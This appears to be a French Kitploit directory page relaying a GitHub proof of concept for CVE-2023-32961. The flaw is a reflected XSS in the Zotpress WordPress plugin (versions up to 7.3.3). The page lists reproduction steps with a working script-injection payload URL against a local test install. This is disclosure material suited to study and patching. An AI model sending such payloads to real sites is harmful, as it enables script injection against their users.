Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-32961 — PoC de CVE-2023-32961 | Kitploit
Outils/GitHubGitHub/lourc0d3/cve-2023-32961
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC de CVE-2023-32961

Voir le dépôt
211il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-32961

Ce référentiel concerne une vulnérabilité XSS dans le plugin Wordpress Zotpress.

Détails du composant


Nom du composant

Zotpress

Version vulnérable

≤ 7.3.3

Slug du composant

zotpress

Lien du composant

https://wordpress.org/plugins/zotpress/

Prérequis


Non authentifié

Détails de la vulnérabilité


Description courte

La fonction get_request_token dans zotpress/lib/admin/admin.accounts.oauth.php est vulnérable à une attaque XSS.

Télécharger l’outil

Comment reproduire (PoC)

  1. Installez l'extension PHP oauth pour déclencher la vulnérabilité. (C'est une option de Zotpress)
  2. Connectez-vous à zotero.org
  3. Les conditions doivent être remplies pour que la fonction get_request_token s'exécute. (première fois uniquement) Envoyez une charge utile comme celle-ci : http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Envoyez la charge utile ci-dessous http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Informations supplémentaires

  • Vous avez besoin d'un compte zotero.org.

  • Vous devez définir la valeur de oauthState sur 1 pour la déclencher. Si la charge utile ci-dessus ne fonctionne pas, vous devez trouver un moyen de définir oauthState sur 1.

    • expression conditionnelle :

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • Installation facile de l'extension PHP oauth :

    • Commande en une ligne :

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • Testé avec l'image Docker wordpress:latest.

Vidéo du PoC

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

Références


CVE-2023-32961